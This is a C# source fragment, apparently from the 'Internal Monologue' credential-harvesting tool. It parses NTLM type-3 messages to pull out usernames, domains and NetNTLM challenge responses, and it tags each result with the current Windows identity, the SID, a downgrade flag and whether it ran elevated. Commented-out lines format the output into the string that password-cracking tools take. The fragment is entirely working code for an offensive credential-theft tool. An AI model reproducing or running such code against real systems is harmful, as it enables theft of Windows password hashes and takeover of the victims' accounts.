public void AddResponse(InternalMonologueResponse response) { if (response.Resp1.IsNullOrWhiteSpace()) { return; } Responses.Add(response); }
//This function parses the NetNTLM response from a type-3 message private InternalMonologueResponse ParseNTResponse(byte[] message, string challenge) { ushort lm_resp_len = BitConverter.ToUInt16(message, 12); uint lm_resp_off = BitConverter.ToUInt32(message, 16); ushort nt_resp_len = BitConverter.ToUInt16(message, 20); uint nt_resp_off = BitConverter.ToUInt32(message, 24); ushort domain_len = BitConverter.ToUInt16(message, 28); uint domain_off = BitConverter.ToUInt32(message, 32); ushort user_len = BitConverter.ToUInt16(message, 36); uint user_off = BitConverter.ToUInt32(message, 40); byte[] lm_resp = new byte[lm_resp_len]; byte[] nt_resp = new byte[nt_resp_len]; byte[] domain = new byte[domain_len]; byte[] user = new byte[user_len]; Array.Copy(message, lm_resp_off, lm_resp, 0, lm_resp_len); Array.Copy(message, nt_resp_off, nt_resp, 0, nt_resp_len); Array.Copy(message, domain_off, domain, 0, domain_len); Array.Copy(message, user_off, user, 0, user_len); var result = new InternalMonologueResponse(); result.NtlmDowngrade = downgrade; result.FromElevated = isElevated; result.Challenge = challenge; result.ImpersonatedIdentity = WindowsIdentity.GetCurrent().Name; result.SID = WindowsIdentity.GetCurrent().User.ToString(); if (nt_resp_len == 24) { result.UserName = ConvertHex(ByteArrayToString(user)); result.Domain = ConvertHex(ByteArrayToString(domain)); result.Resp1 = ByteArrayToString(lm_resp); result.Resp2 = ByteArrayToString(nt_resp); // result = ConvertHex(ByteArrayToString(user)) + "::" + ConvertHex(ByteArrayToString(domain)) + ":" + ByteArrayToString(lm_resp) + ":" + ByteArrayToString(nt_resp) + ":" + challenge; } else if (nt_resp_len > 24) { result.UserName = ConvertHex(ByteArrayToString(user)); result.Domain = ConvertHex(ByteArrayToString(domain)); result.Resp1 = ByteArrayToString(nt_resp).Substring(0, 32); result.Resp2 = ByteArrayToString(nt_resp).Substring(32); //result = ConvertHex(ByteArrayToString(user)) + "::" + ConvertHex(ByteArrayToString(domain)) + ":" + challenge + ":" + ByteArrayToString(nt_resp).Substring(0, 32) + ":" + ByteArrayToString(nt_resp).Substring(32); } return(result); }